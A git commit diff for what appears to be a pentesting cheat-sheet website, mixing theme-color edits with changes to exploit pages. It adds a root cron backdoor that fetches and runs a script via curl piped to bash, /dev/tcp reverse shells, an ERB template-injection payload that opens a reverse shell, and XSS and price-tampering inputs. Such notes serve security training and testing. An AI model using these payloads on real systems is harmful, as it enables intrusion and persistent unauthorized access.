changed the theme color a bit

_config.ts

@@ -71,9 +71,9 @@ site
                 'orange': '#c2410c',
                 'orange-dark': '#7c2d12',
                 'orange-light': '#ea580c',
-                'pink': '#cb1777',
-                'pink-dark': '#4d072d',
-                'pink-light': '#d462b6',
+                'pink': '#cb17c7',
+                'pink-dark': '#4d074d',
+                'pink-light': '#d462d6',
                 'red': '#7f1d1d',
                 'red-dark': '#450a0a',
                 'red-light': '#b91c1c',

src/_includes/layouts/base.vto

@@ -7,7 +7,7 @@
         <title>{{ title || site.title }} {{ if url != "/"  }}| {{ site.title }}{{ /if }}</title>
         <meta name="description" content="{{ description || site.description }}">
         {{# <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' data: w3.org/svg/2000 http://localhost:8888"> #}}
-        <link rel="icon" type="image/x-icon" href="/assets/img/favicon-32.png">
+        <link rel="icon" type="image/x-icon" href="/assets/img/favicon.png">
         <link rel="stylesheet" href="/styles.css">
         <link rel="stylesheet" href="/css/carbonads.css">
         {{ if url.includes("/exploit/") }}

src/exploit/container/docker/docker-escape.md

@@ -7,7 +7,7 @@ tags:
 refs:
     - https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation
     - https://gist.github.com/PwnPeter/3f0a678bf44902eae07486c9cc589c25
-date: 2024-01-26
+date: 2024-04-13
 draft: false
 ---
 
@@ -36,6 +36,7 @@ ls -al /mnt
 ls -al /opt
 ls -al /srv
 ls -al /var/www
+ls -al /var/tmp
 ls -al /tmp
 ls -al /dev/shm
 

src/exploit/linux/post-exploitation/linux-backdoors.md

@@ -4,7 +4,7 @@ description: After compromising a target machine, the adversary attempts to esta
 tags:
     - Privilege Escalation
 refs:
-date: 2023-03-19
+date: 2024-04-13
 draft: false
 ---
 
@@ -26,24 +26,30 @@ nc -lvnp 4444
 
 ## Cron
 
-Add this line to the cron file like **`/etc/crontab`** in the target machine.
+Add the following line to the cron file like **`/etc/crontab`** in the target machine.  
+Replace `10.0.0.1` with your ip address.
 
 ```sh
-* * * * * root curl http://<local-ip>:<local-port>/shell | bash
+* * * * * root curl http://10.0.0.1/shell | bash
 ```
 
-Create the **“shell”** file in local machine.  
-Replace **`<local-ip>`** with your ip address.
+Create a file named "shell" in local machine.  
+Replace `10.0.0.1` with your ip address.
 
 ```sh
 #!/bin/bash
-bash -i >& /dev/tcp/<local-ip>/4444 0>&1
+bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
 ```
 
-Now start local web server in local machine. Note that your current working direcotry need to be where the **“shell”** is located.
+Now start local web server and listener in each terminal in local machine.
 
 ```sh
-python3 -m http.server 4444
+# Terminal 1
+# We need to start this in the directory where our 'shell' file is located.
+sudo python3 -m http.server 80
+
+# Terminal 2
+nc -lvnp 4444
 ```
 
 Once the cron job downloads the **“shell”** file,  run **“bash”** command to execute the **“shell”**.  

src/exploit/linux/privilege-escalation/index.md

@@ -6,7 +6,7 @@ tags:
     - Remote Code Execution
 refs:
     - https://book.hacktricks.xyz/linux-hardening/privilege-escalation
-date: 2024-02-18
+date: 2024-04-13
 draft: false
 ---
 
@@ -205,6 +205,7 @@ ls -la /srv/
 # Temporary files
 ls -la /dev/shm/
 ls -la /tmp
+ls -al /var/tmp
 
 # Services
 ls -al /etc/systemd/system/
@@ -593,6 +594,13 @@ find / -name *shadow* 2>/dev/null
 # Kerberos
 find / -name "*.keytab" 2>/dev/null
 
+# -user: Specify the file owner
+find / -user www-data 2>/dev/null
+# -group Specify the group
+find / -group www-data 2>/dev/null
+
+# Executable files
+find / -type f -executable 2>/dev/null
 
 # ----------------------------------------
 # Find more faster than `find` command.

src/exploit/malware/malware-static-analysis.md

@@ -4,12 +4,13 @@ description: Static Analysis is a method of malware analysis that analyze withou
 tags:
     - Malware
 refs:
-date: 2023-05-17
+date: 2024-04-13
 draft: false
 ---
 
 ```sh
 file example.exe
+stat example.exe
 file-magic.py example.exe
 binwalk -e example.exe
 strings example.exe

src/exploit/network/protocol/ssh-pentesting.md

@@ -7,7 +7,7 @@ tags:
     - Privilege Escalation
 refs:
     - https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf
-date: 2023-10-30
+date: 2024-04-13
 draft: false
 ---
 
@@ -181,7 +181,7 @@ ssh domain-name\\username@domain-controller
 
 <br />
 
-## Transfer Files From Remote to Local → Transfer Files
+## Transfer Files
 
 ### Send a File/Directory to Another Machine
 

src/exploit/web/api/index.md

@@ -5,7 +5,7 @@ tags:
     - Web
 refs:
     - https://medium.com/@sebnemK/node-js-rce-and-a-simple-reverse-shell-ctf-1b2de51c1a44
-date: 2024-01-18
+date: 2024-04-13
 draft: false
 ---
 
@@ -52,7 +52,7 @@ Below fuzz target web server directly so be careful when doing that.
 
 ```bash
 ffuf -u https://FUZZ.api.example.com -w wordlist.txt
-ffuf -u https://api/FUZZ.example.com -w wordlist.txt
+ffuf -u https://api.FUZZ.example.com -w wordlist.txt
 ```
 
 <br />

src/exploit/web/jwt-pentesting.md

@@ -5,7 +5,7 @@ tags:
     - Web
 refs:
     - https://portswigger.net/web-security/jwt
-date: 2024-02-18
+date: 2024-04-13
 draft: false
 ---
 
@@ -39,7 +39,7 @@ Go to the website and replace the original JWT with the new one in HTTP header.
 
 ## RS256 → HS256 Algorithm Attack
 
-Reference: https://book.hacktricks.xyz/pentesting-web/hacking-jwt-json-web-tokens#change-the-algorithm-rs256-asymmetric-to-hs256-symmetric-cve-2016-5431-cve-2016-10555
+Reference: [HackTricks](https://book.hacktricks.xyz/pentesting-web/hacking-jwt-json-web-tokens#change-the-algorithm-rs256-asymmetric-to-hs256-symmetric-cve-2016-5431-cve-2016-10555)
 
 When changing the `alg` value from `RS256` (asymmetric) to `HS256` (symmetric) may, the target server may use the public key as the secret key. It may be possible to verify the signature.  
 

src/exploit/web/security-risk/business-logic-attack.md

@@ -4,7 +4,7 @@ description: Business Logic is the part of the program that encodes the real-wor
 tags:
     - Web
 refs:
-date: 2023-09-12
+date: 2024-04-13
 draft: false
 ---
 
@@ -14,7 +14,11 @@ draft: false
 productId=-1
 productId=a
 productId=  # empty value
-productId=1&price=-1000
+
+price=-1000
+price=1000-
+price=%1000
+price=%-1000
 ```
 
 <br />

src/exploit/web/security-risk/erb-ssti.md

@@ -0,0 +1,33 @@
+---
+title: ERB SSTI
+description: ERB may be vulnerable to SSTI.
+tags:
+    - Web
+refs:
+    - https://trustedsec.com/blog/rubyerb-template-injection
+date: 2024-04-13
+draft: false
+---
+
+## Payloads
+
+Try the following payloads on URL path, params, input, etc.
+
+```bash
+<%= 7*7 %>
+<%= user.username %>
+<%= system("whoami"); %>
+```
+
+<br />
+
+## Exploit
+
+If the above payloads affect responses, we can inject arbitrary code as below:
+
+```bash
+<%= system("ping -c 1 10.0.0.1"); %>
+
+# Reverse Shell
+<%= system("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"); %>
+```

src/exploit/web/security-risk/ssti.md

@@ -4,7 +4,7 @@ description:
 tags:
     - Web
 ref:
-date: 2023-10-18
+date: 2024-04-13
 draft: false
 ---
 
@@ -29,6 +29,7 @@ draft: false
 |`{{ '7'*7 }}`|Angular, Django, Flask, Go, Jinja2, Tornado, Twig, ???|
 |`{{:2*3}}`|JsRender|
 |`{% debug %}`|Django|
+|`<%= 7*7 %>`|ERB (Embedded Ruby)|
 
 <br />
 
@@ -39,6 +40,7 @@ Please see each article for details about SSTI.
 - [Angular](/exploit/web/framework/javascript/angular-pentesting/)
 - [Django](/exploit/web/framework/python/django-pentesting/)
 - [Flask/Jinja2](/exploit/web/framework/python/flask-jinja2-pentesting/)
+- [ERB (Embedded Ruby)](/exploit/web/erb-ssti/)
 - [Go](/exploit/web/go-ssti/)
 - [JsRender](/exploit/web/template-engine/jsrender-template-injection/)
 - [Pug](/exploit/web/template-engine/pug-pentesting/)

src/exploit/web/security-risk/xss.md

@@ -11,7 +11,7 @@ refs:
     - https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
     - https://brutelogic.com.br/blog/building-xss-polyglots/
     - https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
-date: 2023-11-28
+date: 2024-04-13
 draft: false
 ---
 
@@ -27,8 +27,6 @@ Additionary, we can also find CVE related XSS [here](https://cve.mitre.org/cgi-b
 ```txt
 <script>alert(1)</script>
 "><script>alert(1)</script>
-<script>alert(1)</script>
-"><script>alert(1)</script>
 '></script><script>alert(1)</script>
 <script>onerror=alert;throw 123</script>
 <script>{onerror=alert}throw 123</script>

src/index.vto

@@ -311,6 +311,11 @@ bodyClass: body-index
         {{# /Scroll wrapper #}}
     </div>
     {{# /List of exploit #}}
+
+    <div class="w-full bg-red-500 py-24 flex flex-col items-center">
+        <img src="/assets/img/icon.png" alt="icon" class="w-[120px] md:w-[140px]" />
+    </div>
+
 </div>
 
 <script>

src/styles.css

@@ -6,9 +6,9 @@
 @import "https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@11.0.0/build/styles/github-dark.min.css";
 
 :root {
-    --color-pink: #cb1777;
-    --color-pink-dark: #4d072d;
-    --color-pink-light: #d462b6;
+    --color-pink: #cb1797;
+    --color-pink-dark: #4d075d;
+    --color-pink-light: #d462d6;
     --color-slate: #1e293b;
     --color-slate-dark: #081120;
     --color-slate-littledark: #121c2f;